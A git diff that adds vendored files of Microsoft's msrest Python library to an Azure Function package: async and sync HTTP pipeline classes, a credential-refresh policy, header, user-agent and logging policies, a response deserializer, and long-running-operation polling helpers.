a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_abc.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_abc.py new file mode 100644 index 0000000..9be0a9e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_abc.py @@ -0,0 +1,165 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc + +from typing import Any, List, Union, Callable, AsyncIterator, Optional, Generic, TypeVar + +from . 
import Request, Response, Pipeline, SansIOHTTPPolicy + + +AsyncHTTPResponseType = TypeVar("AsyncHTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + +try: + from contextlib import AbstractAsyncContextManager # type: ignore +except ImportError: # Python <= 3.7 + class AbstractAsyncContextManager(object): # type: ignore + async def __aenter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + async def __aexit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + + + + +class AsyncHTTPPolicy(abc.ABC, Generic[HTTPRequestType, AsyncHTTPResponseType]): + """An http policy ABC. + """ + def __init__(self) -> None: + # next will be set once in the pipeline + self.next = None # type: Optional[Union[AsyncHTTPPolicy[HTTPRequestType, AsyncHTTPResponseType], AsyncHTTPSender[HTTPRequestType, AsyncHTTPResponseType]]] + + @abc.abstractmethod + async def send(self, request: Request, **kwargs: Any) -> Response[HTTPRequestType, AsyncHTTPResponseType]: + """Mutate the request. + + Context content is dependent of the HTTPSender. + """ + pass + + +class _SansIOAsyncHTTPPolicyRunner(AsyncHTTPPolicy[HTTPRequestType, AsyncHTTPResponseType]): + """Async implementation of the SansIO policy. + """ + + def __init__(self, policy: SansIOHTTPPolicy) -> None: + super(_SansIOAsyncHTTPPolicyRunner, self).__init__() + self._policy = policy + + async def send(self, request: Request, **kwargs: Any) -> Response[HTTPRequestType, AsyncHTTPResponseType]: + self._policy.on_request(request, **kwargs) + try: + response = await self.next.send(request, **kwargs) # type: ignore + except Exception: + if not self._policy.on_exception(request, **kwargs): + raise + else: + self._policy.on_response(request, response, **kwargs) + return response + + +class AsyncHTTPSender(AbstractAsyncContextManager, abc.ABC, Generic[HTTPRequestType, AsyncHTTPResponseType]): + """An http sender ABC. + """ + + @abc.abstractmethod + async def send(self, request: Request[HTTPRequestType], **config: Any) -> Response[HTTPRequestType, AsyncHTTPResponseType]: + """Send the request using this HTTP sender. + """ + pass + + def build_context(self) -> Any: + """Allow the sender to build a context that will be passed + across the pipeline with the request. + + Return type has no constraints. Implementation is not + required and None by default. + """ + return None + + def __enter__(self): + raise TypeError("Use async with instead") + + def __exit__(self, exc_type, exc_val, exc_tb): + # __exit__ should exist in pair with __enter__ but never executed + pass # pragma: no cover + + +class AsyncPipeline(AbstractAsyncContextManager, Generic[HTTPRequestType, AsyncHTTPResponseType]): + """A pipeline implementation. + + This is implemented as a context manager, that will activate the context + of the HTTP sender. 
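+
+    A minimal usage sketch (illustrative, not from the original source;
+    ``policies``, ``sender`` and ``request`` are assumed to be built elsewhere)::
+
+        async with AsyncPipeline(policies, sender) as pipeline:
+            response = await pipeline.run(request)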
+ """ + + def __init__(self, policies: List[Union[AsyncHTTPPolicy, SansIOHTTPPolicy]] = None, sender: Optional[AsyncHTTPSender[HTTPRequestType, AsyncHTTPResponseType]] = None) -> None: + self._impl_policies = [] # type: List[AsyncHTTPPolicy[HTTPRequestType, AsyncHTTPResponseType]] + if sender: + self._sender = sender + else: + # Import default only if nothing is provided + from .aiohttp import AioHTTPSender + self._sender = AioHTTPSender() + + for policy in (policies or []): + if isinstance(policy, SansIOHTTPPolicy): + self._impl_policies.append(_SansIOAsyncHTTPPolicyRunner(policy)) + else: + self._impl_policies.append(policy) + for index in range(len(self._impl_policies)-1): + self._impl_policies[index].next = self._impl_policies[index+1] + if self._impl_policies: + self._impl_policies[-1].next = self._sender + + def __enter__(self): + raise TypeError("Use 'async with' instead") + + def __exit__(self, exc_type, exc_val, exc_tb): + # __exit__ should exist in pair with __enter__ but never executed + pass # pragma: no cover + + async def __aenter__(self) -> 'AsyncPipeline': + await self._sender.__aenter__() + return self + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + await self._sender.__aexit__(*exc_details) + + async def run(self, request: Request, **kwargs: Any) -> Response[HTTPRequestType, AsyncHTTPResponseType]: + context = self._sender.build_context() + pipeline_request = Request(request, context) + first_node = self._impl_policies[0] if self._impl_policies else self._sender + return await first_node.send(pipeline_request, **kwargs) # type: ignore + +__all__ = [ + 'AsyncHTTPPolicy', + 'AsyncHTTPSender', + 'AsyncPipeline', +] \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_requests.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_requests.py new file mode 100644 index 0000000..690cbd1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_requests.py @@ -0,0 +1,129 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
+# +# -------------------------------------------------------------------------- +import asyncio +from collections.abc import AsyncIterator +import functools +import logging +from typing import Any, Callable, Optional, AsyncIterator as AsyncIteratorType + +from oauthlib import oauth2 +import requests +from requests.models import CONTENT_CHUNK_SIZE + +from ..exceptions import ( + TokenExpiredError, + ClientRequestError, + raise_with_traceback +) +from ..universal_http.async_requests import AsyncBasicRequestsHTTPSender +from . import AsyncHTTPSender, AsyncHTTPPolicy, Response, Request +from .requests import RequestsContext + + +_LOGGER = logging.getLogger(__name__) + + +class AsyncPipelineRequestsHTTPSender(AsyncHTTPSender): + """Implements a basic Pipeline, that supports universal HTTP lib "requests" driver. + """ + + def __init__(self, universal_http_requests_driver: Optional[AsyncBasicRequestsHTTPSender]=None) -> None: + self.driver = universal_http_requests_driver or AsyncBasicRequestsHTTPSender() + + async def __aenter__(self) -> 'AsyncPipelineRequestsHTTPSender': + await self.driver.__aenter__() + return self + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + await self.driver.__aexit__(*exc_details) + + async def close(self): + await self.__aexit__() + + def build_context(self): + # type: () -> RequestsContext + return RequestsContext( + session=self.driver.session, + ) + + async def send(self, request: Request, **kwargs) -> Response: + """Send request object according to configuration. + + :param Request request: The request object to be sent. + """ + if request.context is None: # Should not happen, but make mypy happy and does not hurt + request.context = self.build_context() + + if request.context.session is not self.driver.session: + kwargs['session'] = request.context.session + + return Response( + request, + await self.driver.send(request.http_request, **kwargs) + ) + + +class AsyncRequestsCredentialsPolicy(AsyncHTTPPolicy): + """Implementation of request-oauthlib except and retry logic. + """ + def __init__(self, credentials): + super(AsyncRequestsCredentialsPolicy, self).__init__() + self._creds = credentials + + async def send(self, request, **kwargs): + session = request.context.session + try: + self._creds.signed_session(session) + except TypeError: # Credentials does not support session injection + _LOGGER.warning("Your credentials class does not support session injection. Performance will not be at the maximum.") + request.context.session = session = self._creds.signed_session() + + try: + try: + return await self.next.send(request, **kwargs) + except (oauth2.rfc6749.errors.InvalidGrantError, + oauth2.rfc6749.errors.TokenExpiredError) as err: + error = "Token expired or is invalid. Attempting to refresh." + _LOGGER.warning(error) + + try: + try: + self._creds.refresh_session(session) + except TypeError: # Credentials does not support session injection + _LOGGER.warning("Your credentials class does not support session injection. Performance will not be at the maximum.") + request.context.session = session = self._creds.refresh_session() + + return await self.next.send(request, **kwargs) + except (oauth2.rfc6749.errors.InvalidGrantError, + oauth2.rfc6749.errors.TokenExpiredError) as err: + msg = "Token expired or is invalid." + raise_with_traceback(TokenExpiredError, msg, err) + + except (requests.RequestException, + oauth2.rfc6749.errors.OAuth2Error) as err: + msg = "Error occurred in request." 
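+            # raise_with_traceback re-raises the failure as ClientRequestError
+            # while preserving the original exception's traceback.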
+ raise_with_traceback(ClientRequestError, msg, err) + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/requests.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/requests.py new file mode 100644 index 0000000..1074f59 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/requests.py @@ -0,0 +1,194 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import contextlib +import logging +import threading +from typing import TYPE_CHECKING, List, Callable, Iterator, Any, Union, Dict, Optional # pylint: disable=unused-import +import warnings + +from oauthlib import oauth2 +import requests +from requests.models import CONTENT_CHUNK_SIZE + +from urllib3 import Retry # Needs requests 2.16 at least to be safe + +from ..exceptions import ( + TokenExpiredError, + ClientRequestError, + raise_with_traceback +) +from ..universal_http import ClientRequest +from ..universal_http.requests import BasicRequestsHTTPSender +from . import HTTPSender, HTTPPolicy, Response, Request + + +_LOGGER = logging.getLogger(__name__) + + +class RequestsCredentialsPolicy(HTTPPolicy): + """Implementation of request-oauthlib except and retry logic. + """ + def __init__(self, credentials): + super(RequestsCredentialsPolicy, self).__init__() + self._creds = credentials + + def send(self, request, **kwargs): + session = request.context.session + try: + self._creds.signed_session(session) + except TypeError: # Credentials does not support session injection + _LOGGER.warning("Your credentials class does not support session injection. Performance will not be at the maximum.") + request.context.session = session = self._creds.signed_session() + + try: + try: + return self.next.send(request, **kwargs) + except (oauth2.rfc6749.errors.InvalidGrantError, + oauth2.rfc6749.errors.TokenExpiredError) as err: + error = "Token expired or is invalid. Attempting to refresh." 
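+                # After logging, the policy refreshes the OAuth session below and
+                # retries the request once; a second failure raises TokenExpiredError.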
+ _LOGGER.warning(error) + + try: + try: + self._creds.refresh_session(session) + except TypeError: # Credentials does not support session injection + _LOGGER.warning("Your credentials class does not support session injection. Performance will not be at the maximum.") + request.context.session = session = self._creds.refresh_session() + + return self.next.send(request, **kwargs) + except (oauth2.rfc6749.errors.InvalidGrantError, + oauth2.rfc6749.errors.TokenExpiredError) as err: + msg = "Token expired or is invalid." + raise_with_traceback(TokenExpiredError, msg, err) + + except (requests.RequestException, + oauth2.rfc6749.errors.OAuth2Error) as err: + msg = "Error occurred in request." + raise_with_traceback(ClientRequestError, msg, err) + +class RequestsPatchSession(HTTPPolicy): + """Implements request level configuration + that are actually to be done at the session level. + + This is highly deprecated, and is totally legacy. + The pipeline structure allows way better design for this. + """ + _protocols = ['http://', 'https://'] + + def send(self, request, **kwargs): + """Patch the current session with Request level operation config. + + This is deprecated, we shouldn't patch the session with + arguments at the Request, and "config" should be used. + """ + session = request.context.session + + old_max_redirects = None + if 'max_redirects' in kwargs: + warnings.warn("max_redirects in operation kwargs is deprecated, use config.redirect_policy instead", + DeprecationWarning) + old_max_redirects = session.max_redirects + session.max_redirects = int(kwargs['max_redirects']) + + old_trust_env = None + if 'use_env_proxies' in kwargs: + warnings.warn("use_env_proxies in operation kwargs is deprecated, use config.proxies instead", + DeprecationWarning) + old_trust_env = session.trust_env + session.trust_env = bool(kwargs['use_env_proxies']) + + old_retries = {} + if 'retries' in kwargs: + warnings.warn("retries in operation kwargs is deprecated, use config.retry_policy instead", + DeprecationWarning) + max_retries = kwargs['retries'] + for protocol in self._protocols: + old_retries[protocol] = session.adapters[protocol].max_retries + session.adapters[protocol].max_retries = max_retries + + try: + return self.next.send(request, **kwargs) + finally: + if old_max_redirects: + session.max_redirects = old_max_redirects + + if old_trust_env: + session.trust_env = old_trust_env + + if old_retries: + for protocol in self._protocols: + session.adapters[protocol].max_retries = old_retries[protocol] + +class RequestsContext(object): + def __init__(self, session): + self.session = session + + +class PipelineRequestsHTTPSender(HTTPSender): + """Implements a basic Pipeline, that supports universal HTTP lib "requests" driver. + """ + + def __init__(self, universal_http_requests_driver=None): + # type: (Optional[BasicRequestsHTTPSender]) -> None + self.driver = universal_http_requests_driver or BasicRequestsHTTPSender() + + def __enter__(self): + # type: () -> PipelineRequestsHTTPSender + self.driver.__enter__() + return self + + def __exit__(self, *exc_details): # pylint: disable=arguments-differ + self.driver.__exit__(*exc_details) + + def close(self): + self.__exit__() + + def build_context(self): + # type: () -> RequestsContext + return RequestsContext( + session=self.driver.session, + ) + + def send(self, request, **kwargs): + # type: (Request[ClientRequest], Any) -> Response + """Send request object according to configuration. + + :param Request request: The request object to be sent. 
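+
+        A hedged sketch of direct use (the pipeline normally calls this;
+        ``client_request`` is an assumed, already-built ClientRequest)::
+
+            with PipelineRequestsHTTPSender() as sender:
+                response = sender.send(Request(client_request))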
+ """ + if request.context is None: # Should not happen, but make mypy happy and does not hurt + request.context = self.build_context() + + if request.context.session is not self.driver.session: + kwargs['session'] = request.context.session + + return Response( + request, + self.driver.send(request.http_request, **kwargs) + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/universal.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/universal.py new file mode 100644 index 0000000..228956c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/universal.py @@ -0,0 +1,253 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module represents universal policy that works whatever the HTTPSender implementation +""" +import json +import logging +import os +import xml.etree.ElementTree as ET +import platform +import codecs +import re + +from typing import Mapping, Any, Optional, AnyStr, Union, IO, cast, TYPE_CHECKING # pylint: disable=unused-import + +from ..version import msrest_version as _msrest_version +from . import SansIOHTTPPolicy +from ..exceptions import DeserializationError, raise_with_traceback +from ..http_logger import log_request, log_response + +if TYPE_CHECKING: + from . import Request, Response # pylint: disable=unused-import + + +_LOGGER = logging.getLogger(__name__) + +_BOM = codecs.BOM_UTF8.decode(encoding='utf-8') + + +class HeadersPolicy(SansIOHTTPPolicy): + """A simple policy that sends the given headers + with the request. + + This overwrite any headers already defined in the request. 
+ """ + def __init__(self, headers): + # type: (Mapping[str, str]) -> None + self.headers = headers + + def on_request(self, request, **kwargs): + # type: (Request, Any) -> None + http_request = request.http_request + http_request.headers.update(self.headers) + +class UserAgentPolicy(SansIOHTTPPolicy): + _USERAGENT = "User-Agent" + _ENV_ADDITIONAL_USER_AGENT = 'AZURE_HTTP_USER_AGENT' + + def __init__(self, user_agent=None, overwrite=False): + # type: (Optional[str], bool) -> None + self._overwrite = overwrite + if user_agent is None: + self._user_agent = "python/{} ({}) msrest/{}".format( + platform.python_version(), + platform.platform(), + _msrest_version + ) + else: + self._user_agent = user_agent + + # Whatever you gave me a header explicitly or not, + # if the env variable is set, add to it. + add_user_agent_header = os.environ.get(self._ENV_ADDITIONAL_USER_AGENT, None) + if add_user_agent_header is not None: + self.add_user_agent(add_user_agent_header) + + @property + def user_agent(self): + # type: () -> str + """The current user agent value.""" + return self._user_agent + + def add_user_agent(self, value): + # type: (str) -> None + """Add value to current user agent with a space. + + :param str value: value to add to user agent. + """ + self._user_agent = "{} {}".format(self._user_agent, value) + + def on_request(self, request, **kwargs): + # type: (Request, Any) -> None + http_request = request.http_request + if self._overwrite or self._USERAGENT not in http_request.headers: + http_request.headers[self._USERAGENT] = self._user_agent + +class HTTPLogger(SansIOHTTPPolicy): + """A policy that logs HTTP request and response to the DEBUG logger. + + This accepts both global configuration, and kwargs request level with "enable_http_logger" + """ + def __init__(self, enable_http_logger = False): + self.enable_http_logger = enable_http_logger + + def on_request(self, request, **kwargs): + # type: (Request, Any) -> None + http_request = request.http_request + if kwargs.get("enable_http_logger", self.enable_http_logger): + log_request(None, http_request) + + def on_response(self, request, response, **kwargs): + # type: (Request, Response, Any) -> None + http_request = request.http_request + if kwargs.get("enable_http_logger", self.enable_http_logger): + log_response(None, http_request, response.http_response, result=response) + + +class RawDeserializer(SansIOHTTPPolicy): + + # Accept "text" because we're open minded people... + JSON_REGEXP = re.compile(r'^(application|text)/([a-z+.]+\+)?json$') + + # Name used in context + CONTEXT_NAME = "deserialized_data" + + @classmethod + def deserialize_from_text(cls, data, content_type=None): + # type: (Optional[Union[AnyStr, IO]], Optional[str]) -> Any + """Decode data according to content-type. + + Accept a stream of data as well, but will be load at once in memory for now. + + If no content-type, will return the string version (not bytes, not stream) + + :param data: Input, could be bytes or stream (will be decoded with UTF8) or text + :type data: str or bytes or IO + :param str content_type: The content type. + """ + if hasattr(data, 'read'): + # Assume a stream + data = cast(IO, data).read() + + if isinstance(data, bytes): + data_as_str = data.decode(encoding='utf-8-sig') + else: + # Explain to mypy the correct type. 
+ data_as_str = cast(str, data) + + # Remove Byte Order Mark if present in string + data_as_str = data_as_str.lstrip(_BOM) + + if content_type is None: + return data + + if cls.JSON_REGEXP.match(content_type): + try: + return json.loads(data_as_str) + except ValueError as err: + raise DeserializationError("JSON is invalid: {}".format(err), err) + elif "xml" in (content_type or []): + try: + + try: + if isinstance(data, unicode): # type: ignore + # If I'm Python 2.7 and unicode XML will scream if I try a "fromstring" on unicode string + data_as_str = data_as_str.encode(encoding="utf-8") # type: ignore + except NameError: + pass + + return ET.fromstring(data_as_str) + except ET.ParseError: + # It might be because the server has an issue, and returned JSON with + # content-type XML.... + # So let's try a JSON load, and if it's still broken + # let's flow the initial exception + def _json_attemp(data): + try: + return True, json.loads(data) + except ValueError: + return False, None # Don't care about this one + success, json_result = _json_attemp(data) + if success: + return json_result + # If i'm here, it's not JSON, it's not XML, let's scream + # and raise the last context in this block (the XML exception) + # The function hack is because Py2.7 messes up with exception + # context otherwise. + _LOGGER.critical("Wasn't XML not JSON, failing") + raise_with_traceback(DeserializationError, "XML is invalid") + raise DeserializationError("Cannot deserialize content-type: {}".format(content_type)) + + @classmethod + def deserialize_from_http_generics(cls, body_bytes, headers): + # type: (Optional[Union[AnyStr, IO]], Mapping) -> Any + """Deserialize from HTTP response. + + Use bytes and headers to NOT use any requests/aiohttp or whatever + specific implementation. + Headers will tested for "content-type" + """ + # Try to use content-type from headers if available + content_type = None + if 'content-type' in headers: + content_type = headers['content-type'].split(";")[0].strip().lower() + # Ouch, this server did not declare what it sent... + # Let's guess it's JSON... + # Also, since Autorest was considering that an empty body was a valid JSON, + # need that test as well.... + else: + content_type = "application/json" + + if body_bytes: + return cls.deserialize_from_text(body_bytes, content_type) + return None + + def on_response(self, request, response, **kwargs): + # type: (Request, Response, Any) -> None + """Extract data from the body of a REST response object. + + This will load the entire payload in memory. + + Will follow Content-Type to parse. + We assume everything is UTF8 (BOM acceptable). + + :param raw_data: Data to be processed. + :param content_type: How to parse if raw_data is a string/bytes. + :raises JSONDecodeError: If JSON is requested and parsing is impossible. 
+ :raises UnicodeDecodeError: If bytes is not UTF8 + :raises xml.etree.ElementTree.ParseError: If bytes is not valid XML + """ + # If response was asked as stream, do NOT read anything and quit now + if kwargs.get("stream", True): + return + + http_response = response.http_response + + response.context[self.CONTEXT_NAME] = self.deserialize_from_http_generics( + http_response.text(), + http_response.headers + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__init__.py new file mode 100644 index 0000000..cd99c3d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__init__.py @@ -0,0 +1,34 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
+# +# -------------------------------------------------------------------------- +import sys + +from .poller import LROPoller, NoPolling, PollingMethod +__all__ = ['LROPoller', 'NoPolling', 'PollingMethod'] + +if sys.version_info >= (3, 5, 2): + # Not executed on old Python, no syntax error + from .async_poller import AsyncNoPolling, AsyncPollingMethod, async_poller + __all__ += ['AsyncNoPolling', 'AsyncPollingMethod', 'async_poller'] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..17ee18c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/async_poller.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/async_poller.cpython-39.pyc new file mode 100644 index 0000000..fcc6abc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/async_poller.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/poller.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/poller.cpython-39.pyc new file mode 100644 index 0000000..3feed09 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/poller.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/async_poller.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/async_poller.py new file mode 100644 index 0000000..50247bd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/async_poller.py @@ -0,0 +1,88 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from .poller import NoPolling as _NoPolling + +from ..serialization import Model +from ..async_client import ServiceClientAsync +from ..pipeline import ClientRawResponse + +class AsyncPollingMethod(object): + """ABC class for polling method. + """ + def initialize(self, client, initial_response, deserialization_callback): + raise NotImplementedError("This method needs to be implemented") + + async def run(self): + raise NotImplementedError("This method needs to be implemented") + + def status(self): + raise NotImplementedError("This method needs to be implemented") + + def finished(self): + raise NotImplementedError("This method needs to be implemented") + + def resource(self): + raise NotImplementedError("This method needs to be implemented") + + +class AsyncNoPolling(_NoPolling): + """An empty async poller that returns the deserialized initial response. + """ + async def run(self): + """Empty run, no polling. + + Just override initial run to add "async" + """ + pass + + +async def async_poller(client, initial_response, deserialization_callback, polling_method): + """Async Poller for long running operations. + + :param client: A msrest service client. Can be a SDK client and it will be casted to a ServiceClient. + :type client: msrest.service_client.ServiceClient + :param initial_response: The initial call response + :type initial_response: msrest.universal_http.ClientResponse or msrest.pipeline.ClientRawResponse + :param deserialization_callback: A callback that takes a Response and return a deserialized object. If a subclass of Model is given, this passes "deserialize" as callback. + :type deserialization_callback: callable or msrest.serialization.Model + :param polling_method: The polling strategy to adopt + :type polling_method: msrest.polling.PollingMethod + """ + + try: + client = client if isinstance(client, ServiceClientAsync) else client._client + except AttributeError: + raise ValueError("Poller client parameter must be a low-level msrest Service Client or a SDK client.") + response = initial_response.response if isinstance(initial_response, ClientRawResponse) else initial_response + + if isinstance(deserialization_callback, type) and issubclass(deserialization_callback, Model): + deserialization_callback = deserialization_callback.deserialize + + # Might raise a CloudError + polling_method.initialize(client, response, deserialization_callback) + + await polling_method.run() + return polling_method.resource() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/poller.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/poller.py new file mode 100644 index 0000000..610db4e --- /dev/null +++ 